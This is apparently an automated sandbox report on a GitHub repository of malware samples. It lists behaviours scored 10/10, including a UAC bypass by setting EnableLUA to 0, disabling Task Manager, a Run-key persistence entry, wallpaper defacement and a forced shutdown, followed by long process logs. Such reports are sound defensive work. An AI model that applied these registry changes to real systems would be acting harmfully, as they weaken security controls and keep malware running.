hxxps://github[.]com/pankoza2-pl/malwaredatabase-old

Analysis

max time kernel
112s
max time network
118s
platform
windows10-2004_x64
resource
win10v2004-20240319-en
resource tags

arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 10:40

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/pankoza2-pl/malwaredatabase-old

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion
Executes dropped EXE 2 IoCs

Processes:

Covid22 1.5.exeCLWCP.exe

pid process

5668 Covid22 1.5.exe
5916 CLWCP.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
5668	Covid22 1.5.exe
5916	CLWCP.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Covid22 1.5.exe	upx
behavioral1/memory/5668-297-0x0000000000400000-0x000000000052B000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\C2DE.tmp\Covid22Server.exe	upx
behavioral1/memory/5668-351-0x0000000000400000-0x000000000052B000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CoronaVirus22 = "c:\\Covid22Server.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
119	raw.githubusercontent.com
120	raw.githubusercontent.com
121	raw.githubusercontent.com
210	raw.githubusercontent.com
211	raw.githubusercontent.com
212	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

CLWCP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\clwcp.bmp"	CLWCP.exe

Drops file in Windows directory 1 IoCs

Processes:

CLWCP.exe

description ioc process

File created C:\Windows\clwcp.bmp CLWCP.exe

description	ioc	process
File created	C:\Windows\clwcp.bmp	CLWCP.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "56"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-817259280-2658881748-983986378-1000\{500BB8DD-6CFC-4F9D-803A-0C52B0C4A1A6}	msedge.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exe

pid process

4192 reg.exe
452 reg.exe
5956 reg.exe
5996 reg.exe

pid	process
4192	reg.exe
452	reg.exe
5956	reg.exe
5996	reg.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 5984 shutdown.exe
Token: SeRemoteShutdownPrivilege 5984 shutdown.exe

description	pid	process
Token: SeShutdownPrivilege	5984	shutdown.exe
Token: SeRemoteShutdownPrivilege	5984	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exe

pid	process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

LogonUI.exe

pid process

5552 LogonUI.exe

pid	process
5552	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4392 wrote to memory of 2096	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 2096	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1532	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 3576	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 3576	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe
PID 4392 wrote to memory of 1956	4392	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
1⤵
PID:3840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5868 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5168 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:3020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
1⤵
PID:1368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:4908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=6068 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:3992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=5556 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:3032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6024 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
1⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5156 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
1⤵
PID:1744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=6212 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:1
1⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6708 --field-trial-handle=2320,i,3025503729105798828,9325691672526736153,262144 --variations-seed-version /prefetch:8
1⤵
PID:3712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.129 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.92 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ff9adf35fd8,0x7ff9adf35fe4,0x7ff9adf35ff0
2⤵
PID:2096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2820 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:2
2⤵
PID:1532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3112 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:3
2⤵
PID:3576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3224 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:1956

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.92\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4392 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.92\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.92\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4392 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:2200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4628 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:1084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4888 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:3988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5088 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3968 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:4892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5472 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:1192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5600 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5952 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:3412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6096 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5340 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:5260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5972 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:5268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6344 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:5368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6368 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:5384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5696 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:5856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=5656 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:6072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5704 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:6080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6408 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:1
2⤵
PID:2956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6768 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:5288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6760 --field-trial-handle=2824,i,8778998447424051293,10973097456949356319,262144 --variations-seed-version /prefetch:8
2⤵
PID:3200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
